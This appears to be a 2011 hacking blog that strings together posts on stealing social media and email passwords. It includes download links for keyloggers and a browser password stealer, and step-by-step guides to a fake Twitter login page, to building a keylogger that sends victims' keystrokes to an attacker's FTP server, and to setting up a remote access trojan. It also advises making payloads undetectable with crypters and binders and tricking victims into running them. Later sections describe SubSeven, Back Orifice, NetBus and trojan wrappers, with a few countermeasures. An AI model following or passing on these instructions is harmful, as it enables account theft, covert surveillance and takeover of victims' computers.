Friday, April 29, 2011

TwitterPasswordDecryptor – Instantly Recover Twitter Account Passwords

TwitterPasswordDecryptor is the FREE tool to instantly recover Twitter account passwords stored by popular web browsers. Most web browsers store the login credentials for visited websites so that user don’t have to remember and enter the password every time. Each of these web browsers use their own proprietary encryption mechanism to store the login passwords including Twitter account passwords.TwitterPasswordDecryptor automatically crawls through each of these browsers and instantly recovers all of the stored Twitter passwords.
TwitterPasswordDecryptor presents both GUI interface as well as command line version, the later is more helpful for Penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for Forensic officials who can get hold of any stored Twitter account passwords and then use that Twitter profile information to further extend their investigation.

TwitterPasswordDecryptor is fully Portable tool which can be directly run anywhere without installing locally. It also comes with Installer for those who wants to install it locally and use it on regular basis. It works on wide range of platforms starting from Windows XP to latest operating system Windows 7.
Features
Currently supports recovering of the stored Twitter account password from following popular Internet browsers:

  • Internet Explorer (all versions from 4 to 8)
  • Firefox
  • Google Chrome
  • Opera Browser
You can download TwitterPasswordDecryptor here:
TwitterPasswordDecryptor.zip
Source:Darkside

How To Hack Facebook/Myspace/Orkut Or Any Email

How To Hack Facebook/Myspace/Orkut Or Any Email By Keylogging
Fud Long Time


Rapzo Logger v 1.5 ( Public Edition )By Rapid

[Image: 92564171.jpg]



" Virus Results By Scan4you.net 0/32 "(Paid Host )


[Image: 78831054.jpg]

Options


[Image: op2wo.jpg]

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers


Steler Logs :

[Image: fine2.jpg]

[Image: fineh.jpg]

Who Wanna Change Assembly See This

[Image: asm.gif]

Download LinkS


http://www.mediafire.com/?belchwxdl6z2xl9

http://akenload.com/download/141/RapZo_L..._.rar.html

http://www.megaupload.com/?d=IFRRHPBX

http://rapidshare.com/files/418946168/Ra...tion__.rar



By Rapidguide From Hacker world Blog

Hack Facebook/Twitter Or Any Email Account With Session Hijacking

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.


As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:



Double-click on someone, and you're instantly logged in as them.



That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.
By sarvesh

How to hack twitter accounts

   ..RE:How to hack twitter Accounts 

.................................................................................................................................................................

Hack twitter accounts


Twitter is one of the topmost widely running social networking sites,Its alexa ranking is 14(As per now).So therefore it is largely becoming target of hackers,Many requests keep coming to me ,please tell us a way to Hack twitter accounts or How to hack twitter accounts,so therefore i today i have written a post on How to hack twitter accounts

Well for this purpose i will tell you the most used method to
hack twitter accounts i.e phishing



How to hack twitter accounts - Phishing



First of all download:Twitter fake login page

Step 1
First extract the contents into a folder

Step 2
Then edit login.php .(right click and then select edit)

In that ,find (CTRL+F) 'http://www.adnan.com.co.in' then change it to your destined URL but don't forget '\'.

Now rename the script to pass.php and save it

Step 3
Now open twitter fake page in wordpad and seach for the term action=,Change action=pass.php

Step 4
Create an id in www.110mb.com , because i know about that site quite well.

Step 5
Then upload the contents into a directory

Step 6
For that,after creating an id you should go to file manager and upload all these files.

Step 7
Then just go to your fake page and enter user name and password and try out whether its working .

Step 8
After you type the file , a password file will be created in the same directory .

Step 9
Then you can see what username and password you have entered.

Now you are ready to hack twitter accounts

Step 10

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

Weak Password Brings ‘Happiness’ to Twitter Hacker

An 18-year-old hacker with a history of celebrity pranks has admitted to Monday’s hijacking of multiple high-profile Twitter accounts, including President-Elect Barack Obama’s, and the official feed for Fox News.

The hacker, who goes by the handle GMZ, told Threat Level on Tuesday he gained entry to Twitter’s administrative control panel by pointing an automated password-guesser at a popular user’s account. The user turned out to be a member of Twitter’s support staff, who’d chosen the weak password "happiness."

Cracking the site was easy, because Twitter allowed an unlimited number of rapid-fire log-in attempts.


The hacker bragged about the hack and revealed that it was a brute force dictionary attack against an administrator account. Twitter does not block repetitive login failures therefore enabling brute force attacks. We are still leaving the incident classification "insufficient authentication" in addition to brute force as we feel an administration interface should have additional authentication mechanism and not just a password.

Twitter announced that a hacker broke into 33 accounts including Obama's now inactive twitter. The hack is a result of a flaw in a web based support tool used by twitter, which where evidently accessible externally without proper authorization

So therefore twittter account can be hacked by using Bruteforce Dictionary attacks

.
......,,,,,,,,.......................................................................................................................

Hack Yahoo,Hotmail,Myspace,MSN account passwords



Hello Friends here is One More tutorial about hacking Facebook , Hotmail ,Yahoo ,Gmail ,Twitter ,orkut ,myspace and msn accounts with easy as 1 2 3 . In my previous article, I mentioned about  Armadax Key logger for Hacking Hotmail, Yahoo, Myspace and Msn account passwords.
Today i am Introducing a very effective key logger namely Vicspy key logger - the key logger that I found extremely Good and user-friendly for hacking hotmail, yahoo account passwords. I have provided link for software download and password ... So Enjoy and Let's Begin the Tutorial .

Hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn Passwords


1. Download Vicspy keylogger for hacking Hotmail, Yahoo, msn ,myspace ,Face book And Gmail account passwords.

2. Extract the Rar to obtain Vicspy keylogger.

3. Simply run peditor.exe to get key logger interface and create a key logger for hacking hotmail, yahoo and msn account password. No need to install software on computer.


4. Now, in Servers , fill in the FTP server which you wanna use to receive logs from keylogger.

Fill in ftp server as:

where:
# user: your username at ftp server.
# pass: your password.
# logs: create a new folder named "logs" at your ftp server. You will receive hotmail, yahoo and msn hacked passwords in this folder.
# ftp.example.com : your ftp server address. (eg: ftp.drivehq.com for drivehq ftp server)

After you have completed filling ftp server, hit on "Check" just adjacent to it to check whether you have entered ftp server correctly and whether server is available.

5.
In Control, check "Melt" to make key logger evaporate after installation on victim computer.

6. Additional Options included in Vicspy key logger are that you can
- Change keylogger file icon
- Bind key logger with another file to make it undetectable by victim.

7. Now, simply choose the path where you want key logger to be saved and hit on "Create" to create key logger file at preferred destination.

8. Now, send this file to your victim and make him to install this binded keylogged file on his computer (Social engineering). You can crypt this keylogger file and then use Fake error message generator to make our key logger undetectable by antivirus.

Once the victim installs key logger on his computer, you will start receiving all typed passwords on his computer in your FTP server account (in logs folder). Thus, our target of hacking hotmail, yahoo, msn account password accomplished.

That's ALL About Vicspy Key logger for hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn account passwords. Vicspy keylogger can also be used for hacking other email account passwords.

Hack Your Victim Fully

Ok Guys Nows Your Day Today Hope its Good ,Well Em Going to Post A Tut For My Fans Coz  all are Requesting Again & Again so Here is the tut Begin
Author : Mr.MindfReak
Title : Hacked Your Victim Fully [Totally]
Our Blog : http://hackguide4u.blogspot.com

Description[Read Carefully]:
Ok So The Trick From Which You Are Going to Learn "Title : Hacked Your Victim Fully [Totally]" Is Called 'Rat' 
Rat:''Remote Administrative Tool''

So For Using Rat U Have Speacial Thing To Be Which Is ''Open Port'' Which u can open by Routers Or See Below How To Port Farward And Make "Open Port" 
Note : "If You Dont Have Router To open Port use Vpn Coz Vpn Open All Ports"

Ok So how To Setup Rat see,

First you need to download these two files:

No-ip DUC : DOWNLOAD
Spy-Net RAT: DOWNLOAD [Password is Spy-Net]

Second We Need To Setup No-ip Account: 
1. Go to www.no-ip.com
2. Create a new account
3. Confirm it from your E-Mail
4. Login To No-IP website
5. Select Add a host
6. Click Create Host
7. Write what you want the name of your No-IP address to be

[Image: igQE.png]
8. Click Create Host
9. Download No-IP DUC , Install it , then login with your Email and password.
10. Once you do You will see your server there. Click on the icon and it will be smiling. (:D)


Port forwarding.

I Will not explain that much ,
1. Go to http://www.portforward.com
2. Click CTRL+F 
3. Select Your Route

4. Follow the guide and do this with the port 81


Now How to Setup SpyNet[Rat]

[Image: spynet26989.png]

1.First of all , Open the Spy-Net , you will get a popup with some weird language , click NO.
2.On Spy-Net , click START and then Opces -> Idioma -> English.ini (thats for changing language of spynet , Default is spanish or something)

Okay so now , I uploaded pics for it to be easier.

1.Go to File -> Create Server -> Select any of the profiles

Connection
[Image: icvK1s.png]

Where it says "Your_Dns_here" Click once on it and click DELETE. Then click ADD and write your No-ip adress , and click Add or OK i dont know what it was

Installation
[Image: icvM90.png]

Leave everything as it is... ( these the options i use personally)

KeyLogger
[Image: icvSXO.png]

Okay , so i guess everyone wants the keylogger , so select it.
And i prefer using the Backspace option too , as if someone logins to facebook , and his email is mrmindfreak@hotmail.com , and he misspelled something and it showed as mrmindfreak@hotmail.com , im sure he will use backspace and fix it , so this will be recorded on your keylogger and you can get the passwords easier :)

Anti-Debug
[Image: icv1qi.png]

Okay select all of them , if you want to test it on sandboxie , unselect the first one :)

Final Step
[Image: icrzVc.png]

Chose anything you want , for changing the icon click on the Picture icon on there and select any .exe or .ico files...And Click On Creat Server You Done , Now Gave u Server to Your Victim And When He Opened it u will Get His Pc On 'Rat' Like Below Pic.

[Image: spynet26989.png]
Note : Your Server is DAetecable Coz its A Trojen So Make it Fud By Using Some Crypters And Bind it And Spread You Can Search Binding Tut On Blog

Tools and Softwares for Trojans and Backdoors

Tool: QAZ


  • It is a companion virus that can spread over the network.

  • It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597.

  • It may have originally been sent out by email.

  • Rename notepad to note.com

  • Modifies the registry key:
    HKLM\software\Microsoft\Windows\Current Version\Run 
Hacking Tool:Tini


  • It is a very tiny trojan program which is only 3 kb and programmed in assembly language. It takes minimal bandwidth to get on victim's computer and takes small disk space.

  • Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The port number is fixed and cannot be customized. This makes it easier for a victim system to detect by scanning for port 7777.

  • From a tini client you can telnet to tini server at port 7777
Tool: Netcat



  • Outbound or inbound connections, TCP or UDP, to or from any ports

  • Ability to use any local source port

  • Ability to use any locally-configured network source address

  • Built-in port-scanning capabilities, with randomizer

  • Built-in loose source-routing capability
Tool: Donald Dick


The attacker uses the client to send command through TCP or SPX to the victim listening on a pre defined port.
Donald Dick uses default port either 23476 or 23477
Donald Dick is a tool that enables a user to control another computer over a network.
It uses a client server architecture with the server residing on the victim's computer.
Tool: SubSeven



  • SubSeven is a backdoor program that enables others to gain full access to Windows 9x systems through network connection.

  • The program consists of three different components : Client (SubSeven.exe), Server (Server.exe) and a Server configuration utility (EditServer.exe).

  • The client is a GUI used to connect to server through a network or internet connection.
Since its debut in February, 1999, SubSeven has become a favorite tool of intruders targeting Windows machines.
It is a RAT (Remote Administration Tool) that provides more options for attack than other Trojans like Back Orifice or NetBus. The SubSeven Trojan is consists of three programs: the SubSeven server, client and server editor. It has a DDoS potential and like other Trojans, SubSeven can be used as perfectly benign remote administration program.
The server must be run on the target computer to allow the attacker's computer to connect to the machine and have total access to it. The server editor (EditServer Program) helps configure the infection characteristics. This allows the hacker to specify whether the compromised system should send an email or ICQ notification to the attacker when the target is online, whether the program should "melt server after installation" and which ports the attacker can use to connect to the server. Once installed, SubSeven's friendly user-interface allows the attacker to easily monitor a victim's keystrokes, watch a computer's web cam, take screen shots, eavesdrop through the computer's microphone, control the mouse pointer, read and write files, and sniff traffic off the victim's local network.

Tool: Back Oriffice 2000
Back Orifice accounts for highest number of infestations on Microsoft computers.
The BO2K server code is only 100KB. The client program is 500KB.
Once installed on a victim PC or server machine, BO2K gives the attacker complete control of the system.
BO2K has stealth capabilities, it will not show up on the task list and runs completely in hidden mode.
BO2K was written by DilDog of the Cult of the Dead Cow. Many of the commands that B02K comes with were directly ported from Sir Dystic's original Back Orifice source code. The document says that it was written with a two-fold purpose: "To enhance the Windows operating system's remote administration capability and to point out that Windows was not designed with security in mind."
B02K is an almost complete rewrite of the original Back Orifice. By default, B02K comes with the capability to talk over TCP as well as UDP, and supports strong encryption through plug-ins. It has added functionality in the areas of file transfer and registry handling. It has hacking features, such as dumping certain cached passwords. It can be configured to be stealthy.
Like other Trojans, Back Orifice is a client/server application which allows the client software to monitor, administer, and perform other network and multimedia actions on the machine running the server. To communicate with the server, either the text based or GUI client can be run on any Microsoft Windows machine.
The B02K server installed without any plugins is ~100K and leaves a small footprint. The client software is ~500K. The whole suite will fit on a single 1.44MB floppy disk. B02K 1.0 will currently run on Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, and Windows XP systems. All of the various parts of the BO2K suite have been tested and found to be working on all of these platforms. It only runs on Intel platforms at the moment.
Back Oriffice Plug-ins


  • BO2K functionality can be extended using BO plug-ins.

  • BOPeep (Complete remote control snap in)

  • Encryption (Encrypts the data sent between the BO2K GUI and the server)

  • BOSOCK32 (Provides stealth capabilities by using ICMP instead of TCP UDP)

  • STCPIO (Provides encrypted flow control between the GUI and the server, making the traffic more difficult to detect on the network)

BO Peep - This plugin gives you a streaming video of the machine's screen that the server is running on. Also provides remote keyboard and mouse accessibility.
Serpent Encryption - This is a very fast implementation of the non-export-restricted 256 bit-SERPENT encryption algorithm.
CAST-256 Encryption - This internationally available plugin provides strong encryption using the CAST-256 algorithm.
IDEA Encrypt - This internationally available plugin provides strong encryption using the IDEA algorithm. 128 Bit Encryption.
RC6 Encryption - This internationally available plugin provides strong encryption using the RC6 algorithm. Provides 384 bit encryption.
STCPIO - TCPIO communications plugin with an encrypted flow control system to make BO2K TCP traffic virtually impossible to detect.
Rattler notifies a specified user as to the whereabouts of a Back Orifice 2000 server via e-mail. Rattler will send an e-mail each time it detects an IP address addition/modification.
rICQ is a plugin for Back Orifice 2000 that operates in a similar fashion to Rattler except that the notification message is sent via ICQ's web pager service.
The Butt Trumpet 2000 plugin for BO2K, once installed and started, sends you an email with the host's IP address. A nice alternative to Rattler.
BoTool provides a graphical file browser and registry editor to the BO2K interface. Makes common tedious BO2K tasks point-and-click simple.

Tool: NetBus
NetBus was written by a Swedish programmer, Carl-Fredrik Neikter, in March 1998. Version 1.5 in English appeared in April. NetBus apparently received little media attention but it was in fairly wide use by the time BO was released on 3 August.
NetBus consists of two parts: a client-program ("netbus.exe") and a server-program often named: "patch.exe" (or "SysEdit.exe" with version 1.5x), which is the actual backdoor. Version 1.60 uses the TCP/UDP-Port # "12345" which can't be altered. From the version 1.70 and higher the port be configured. If it is installed by a "game" called "whackamole" (file name is: "whackjob.zip" (contains the NetBus 1.53 server) its name is "explore.exe". There is also a file called whackjob17.zip, which installs the server of NetBus 1.70 and uses the port 12631. Additionally it is password protected (PW: "ecoli"). The NetBus Server is installed by "game.exe" during the setup routine; the name of the server actually is "explore.exe" located in the windows directory.
To start the server automatically, there is an entry in the registry at: "\HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurrentVersion\Run" normally used with the option "/nomsg". If this entry is deleted, the server won't be started with windows.
The NetBus server is about 4 times as large as the Back Orifice server, and generally less "stealthy." Unlike BO, NetBus is not designed to attach virus-like to legitimate files or applications.
Like BO, the NetBus server can have practically any filename. The usual way it is installed is through simple deception; the program is sent to the victim, or offered on a website, and falsely represented as something it is not. Occasionally it may be included in a setup package for a legitimate application and executed in the process of that setup.
The unsuspecting victim runs the program either directly or by way of the application used as camouflage, and it immediately installs itself and begins to offer access to intruders.
NetBus will always reveal its presence by way of an open port, viewable with netstat.exe. Because of this, many intruders delete netstat.exe from the victim's hard drive immediately upon gaining access. Creating a copy or two of netstat using other names is a good precaution against its loss. A regular check for the presence of netstat.exe, including the file's size and date, is advisable and is one means of spotting intrusions. Attackers may use BO as a means of installing Netbus on the target system. This is because NetBus is sophisticated yet easy to use.
Once access is gained, the intruder will often install other backdoors, ftp or http daemons which open victim's drive(s) to access or he may enable resource sharing on the Net connection
The v1.53 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
NetBus v1.53 is not extremely stealthy, but it is certainly functional and effective.
This utility also has the ability to scan "Class C" addresses by adding "+Number of ports" to the end of the target address. Example: 255.255.255.1+254 will scan 255.255.255.1 through 255.
By default, the v1.6o server is named Patch.exe. It may be renamed. Its size is 4 61K (472,576 bytes). When this program is run, it remains where it is and nothing appears to happen. Unlike v1.53, it can then be deleted uneventfully. However, it is functional. It copies itself to the Windows directory, extracts from within itself a file called KeyHook.dll and activates both programs.
Run without added parameters, v1.6o is persistent; that is, it will execute on its own when the computer is restarted. It makes changes to the Registry; it creates the keys
HKEY_CURRENT_USER\PATCH, where PATCH is the filename before the extension; and by default, it places a value in the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Version 1.60, like v1.53, also creates the Registry keys
HKEY_CURRENT_USER\NETBUS; and HKEY_CURRENT_USER\NETBUS\Settings and places basically the same series of values in the Settings key.
The v1.60 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
Among the new features are greatly expanded file-handling capabilities, an interactive message dialog, password setting and other server controls, and new ways to tamper with the keyboard. Most of its tricks are evident from this console display.
Netbus 1.7 was released to the public on 11/14/98. It is basically the same program as version 1.6, but with an ultra-fast port scanner, capable of redirecting data to another host and port, option to configure the server-exe with some options, like TCP-port and mail notification, ability redirect I/O from console applications to a specified TCP-port and restricting access to only a few IP-numbers.
By default, the v1.70 server is named Patch.exe. It may be renamed. Its default size is 483K (494,592 bytes). With configuration added, its size increases, usually by a couple of hundred bytes. By default, the v1.70 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number. It can however be readily configured to use any other virtual port from 1 to 65534. The port configuration can be pre-set by the sender, and/or it can be changed from remote. It will also open the next-numbered port in sequence, which it apparently uses for responses to the client.
NetBus 2.0 Pro", (often just called "NetBus 2.0") the latest version of this well known backdoor program has been released after Spector took over Netbus. Therefore the new version is a shareware and needs remote user's permission for installation. However, hackers have released variations such as Retail_10.exe which fakes the incomplete patch of ICQ. Instead it installs the "NetBus 2.0 Server" in the invisible and auto starting mode. It even deletes the data logged by the server.

Trojans and Backdoors - 5 :Wrappers



Wrappers



  • How does an attacker get BO2K or any trojan installed on the victim's computer? Answer: Using Wrappers


  • A wrapper attaches a given EXE application (such as games or orifice application) to the BO2K executable.


  • The two programs are wrapped together into a single file. When the user runs the wrapped EXE, it first installs BO2K and then runs the wrapped application.


  • The user only sees the latter application.

Wrappers are used to bind the Trojan executable with a legitimate file. The attacker can compress any (DOS/WIN) binary with tools like "petite.exe". This tool decompresses an exe-file (once compressed) on runtime. This makes it possible for the Trojan to get in virtually undetected, as most antivirus are not able to detect the signatures in the file.
The attacker can place several executables to one executable as well. These wrappers may also support functions like running one file in the background while another one is running on the desktop.
Technically speaking though, wrappers can be considered to be another type of software "glueware" that is used to attach together other software components. A wrapper encapsulates a single data source to make it usable in a more convenient fashion than the original unwrapped source.
Users can be tricked into installing Trojan horses by being enticed or frightened. For example, a Trojan horse might arrive in email described as a computer game. When the user receives the mail, they may be enticed by the description of the game to install it. Although it may in fact be a game, it may also be taking other action that is not readily apparent to the user, such as deleting files or mailing sensitive information to the attacker.
Graffiti.exe is an example of a legitimate file that can be used to drop the Trojan into the target system. This program runs as soon as windows boots up and on execution keep the user distracted for a given period of time by running on the desktop.
Tool: EliteWrap



  • Elite Wrap is an advanced EXE wrapper for Windows 95/98/2K/NT used for SFX archiving and secretly installing and running programs.


  • With EliteWrap one can create a setup program that would extract files to a directory and execute programs or batch files to display help, copy files, etc.
Icon Plus is a conversion program for translating icons between various formats. Icon Plus now can read and save Windows XP icons. Icon Plus can also be worked at from the command prompt. This kind of application can be used by an attacker to disguise his malicious code or Trojan so that users are tricked into executing it.
There are numerous icon libraries available on the Internet that allows a user to change icons to suit various operating systems by aping their look and feel.
Tool: Restorator


It is a versatile skin editor for any Win32 programs: change images, icons, text, sounds, videos, dialogs, menus, and other parts of the user interface. Using this one can create one's own User-styled Custom Applications (UCA).
The relevance of discussing this tool here arises from its ability to modify the user interface of any Windows 32-bit program and thus create UCA's. The user can view, extract, and change images, icons, text, dialogs, sounds, videos, menus and much more.
Infecting via CD-ROM



  • When you place a CD in your CD-ROM drive, it automatically starts with some set up interface. An Autorun.inf file that is placed on such CD's is responsible for this action which would look like this:
    [autorun]  open=setup.exe  icon=setup.exe 


  • Therefore it is quite possible that while running the real setup program a trojan could be run very easily.


  • Turn off the Auto-Start functionality by doing the following:
    Start button-> Settings-> Control Panel-> System-> Device Manager-> CDROM-> Properties -> Settings 
The Autorun.inf file that is placed on such CD's can be configured to execute the Trojan. This makes it possible to infect a machine while running the real setup program. It looks like this:
[autorun]  Open= setup.exe  Icon= setup.exe 
Countermeasure is to stop auto start functionality by doing the following:
Start Button-> Settings-> Control Panel-> System-> Device Manager-> CDROM->Properties- > Settings 
Turn off the reference to Auto Insert Notification

Remote Keyloggers Free Download | Best Keylogger Pack

Remote Keyloggers Free Download | Best Keylogger Pack

Keylogger Pack

Keyloggers log everything that users do on a computer including all keystrokes, chat conversations, applications, windows, websites, passwords, and emails.
Some even record screenshots.

Log the chats from the most known chat programs like ICQ, Miranda, Skype, Google Talk, MSN, AIM, AOL, Yahoo, or QIP.

Content:

Keyloggers:
007 Spy Software v3.873
Ardamax Keylogger v3.1
Award Keylogger v1.8
Elite Keylogger v1.0
FKWP v1.5
FUD Keylogger
Ghost Keylogger v3.80
Local Keylogger Pro v3.1
Perfect Keylogger v1.68.2
Radar Spy
SC Keylogger Pro v3.2
SpyBuddy v3.7.5
Spytech Keystroke Spy v1.10
System Keylogger v2.0

Use a Binder and Crypter to make your keylogger undetectable.
Binders are software used to bind or combine two or more files in one file under one name and extension. You can bind with an image, movie, song, or any file you like.

Binders:
A+ Binder
Multi File Binder
Simple Binder
Weekend Binder

Crypters:
mdCrypter
Scantime Crypter

Trojans and Backdoors - 3 :Various Trojan Genre

Various Trojan Genre


  • Remote Access Trojans

  • Password Sending Trojans

  • Keyloggers

  • Destructive

  • Denial Of Service (DoS) Attack Trojans

  • Proxy/Wingate Trojans

  • FTP Trojans

  • Software Detection Killers
Remote Access Trojans
These are the Trojans usually seen referred to in the media and hence gain high visibility because of their ability to give the attackers the power to do more things on the victim's machine than the victim itself, while standing in front of the machine. Most of these Trojans are often a combination of the other variations discussed below.
Password Sending Trojans
These Trojans are directed towards extracting all the cached passwords and also capture other passwords entered by the victim and email them across to an attacker specified mail address, without the victim realizing it. The password harvest may include passwords for ICQ, IRC, FTP, HTTP or any other application that require a user to enter a login and password. Most of them do not restart when Windows is loaded, as the objective is to gather as much info about the victim's machine as passwords, mIRC logs, ICQ conversations and mail them to the attacker.
Keyloggers
These Trojans log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. They usually come with two functions such as online and offline recording. As with the previous group, these Trojans can be configured to send the log file to a specific e-mail address on a regular basis.
Destructive
The only function of these Trojans is to destroy and delete files. They can deliberately delete core system files (for example: .dll, .ini or .exe files, possibly others) on the target machine. The Trojan is activated by the attacker or sometimes works like a logic bomb and starts on a specific day and at specific hour.
Denial of Service (DoS) Attack Trojans
These Trojans used by attackers to issue a denial of service. A distributed denial of service may also be issued if the attacker has gathered enough victims. WinTrinoo is a DDoS tool that has become popular recently, and if the attacker has infected many ADSL users, major Internet sites could be shut down as a result.
Another variation of a DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail address/addresses with random subjects and contents which cannot be filtered.
Proxy/Wingate Trojans
Underground sites are known to announce freely available proxy servers. These Trojans turn the victim's computer into a proxy/Wingate server available to the whole world or to the attacker only. It is used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for other illegal activities. This gives the attacker complete anonymity and the chance to do everything and point the trail to the victim.
FTP Trojans
These Trojans open port 21(the port for FTP transfers) and lets anybody or just the attacker connect to the machine. They may be password protected so only the attacker is able connect to the computer.
Software Detection Killers
There are such functionalities built into some Trojans, but there are also separate programs that will kill Zone Alarm, Norton Anti-Virus and many other (popular anti-virus/firewall) programs, that protect the target machine. When they are disabled, the attacker has full access to the machine to perform some illegal activity or use the computer to attack others and often disappear.

Trojans and Backdoors - 4 :Modes of Transmission



Modes of Transmission


  • ICQ

  • IRC

  • Attachments

  • Physical Access

  • Browser And E-mail Software Bugs

  • NetBIOS (File Sharing)

  • Fake Programs

  • Un-trusted Sites And Freeware Software

  • ICQ
    People can also get infected while chatting / talking / video messaging over ICQ or any other Instant Messenger Application. It is a risk that the user undertakes when it comes to receiving files no matter from whom or where it comes.

  • IRC
    Here also, the threat comes from exchange of files no matter what they claim to be or where they come from. It is possible that some of these are infected files or disguised files.

  • Attachments
    Any attachment, even if it is from a known source should be screened as it is possible that the source was infected earlier and is not aware of it.

  • Physical Access
    Physical access to a target machine is perhaps the easiest way for an attacker to infect a machine. The motive may be a prank or just plain curiosity.

  • Browser and E-mail Software Bugs
    Having outdated applications can expose the system to malicious programs such as Trojans without any other action on behalf of the attacker.

  • NetBIOS (File Sharing)
    If port 139 is opened, the attacker can install trojan .exe and modify some system file, so that it will run the next time the system is rebooted. To block file sharing in Windows version, go to: Start->Settings->Control Panel->Network->File and Print Sharing and uncheck the boxes there.

Trojans and Backdoors - 1

We will begin with:


  • Terms of reference for various malicious code

  • Defining Trojans and Backdoors

  • Understanding the various backdoor genre

  • Overview of various Trojan tools

  • Learning effective prevention methods and countermeasures

  • Overview of Anti-Trojan software

  • Learning to generate a Trojan program
Trojans and Backdoors

A Trojan horse is:

  • An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

  • A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

  • Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Trojan horses can do anything that the user who executes the program on the remote machine can. This includes deleting files, transmitting to the intruder any files that can be read, changing any files that can be modified, installing other programs such as programs that provide unauthorized network access that the user is entitled to and executing privilege-elevation attacks; that is, the Trojan horse can attempt to exploit a vulnerability to increase the level of access beyond that of the user running the Trojan horse. If this is successful, the Trojan horse can operate with the increased privileges and go about installing other malicious code.
If the user has administrative access to the operating system, the Trojan horse can do anything that an administrator can.
A compromise of any system on a network may have consequences for the other systems on the network. Particularly vulnerable are systems that transmit authentication material, such as passwords, over shared networks in clear text or in a trivially encrypted form, which is very common.
If a system on such a network is compromised via a Trojan (or another method), the intruder may be able to record usernames and passwords or other sensitive information as it navigates the network.
Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote system as the source of an attack by spoofing and thereby cause the remote system to incur liability.

Trojans and Backdoors - 2 : Working of Trojans





  • Attacker gets access to the trojaned system as the system goes online





  • By way of the access provided by the trojan attacker can stage attacks of different types.




  • Trojans work similar to the client-server model. Trojans come in two parts, a Client part and a Server part. The attacker deploys the Client to connect to the Server, which runs on the remote machine when the remote user (unknowingly) executes the Trojan on the machine. The typical protocol used by most Trojans is the TCP/IP protocol, but some functions of the Trojans may make use of the UDP protocol as well.
    When the Server is activated on the remote computer, it will usually try to remain in a stealth mode, or hidden on the computer. This is configurable - for example in the Back Orifice Trojan, the server can be configured to remain in stealth mode and hide its process. Once activated, the server starts listening on default or configured ports for incoming connections from the attacker. It is usual for Trojans to also modify the registry and/or use some other auto starting method.
    To exploit a Trojan, attackers need to ascertain the remote IP address to connect to the machine. Many Trojans have configurable features like mailing the victim's IP, as well as messaging the attacker via ICQ or IRC. This is relevant when the remote machine is on a network with dynamically assigned IP address or when the remote machine uses a dial-up connection to connect to the Internet. DSL users on the other hand, have static IPs so the infected IP is always known to the attacker.
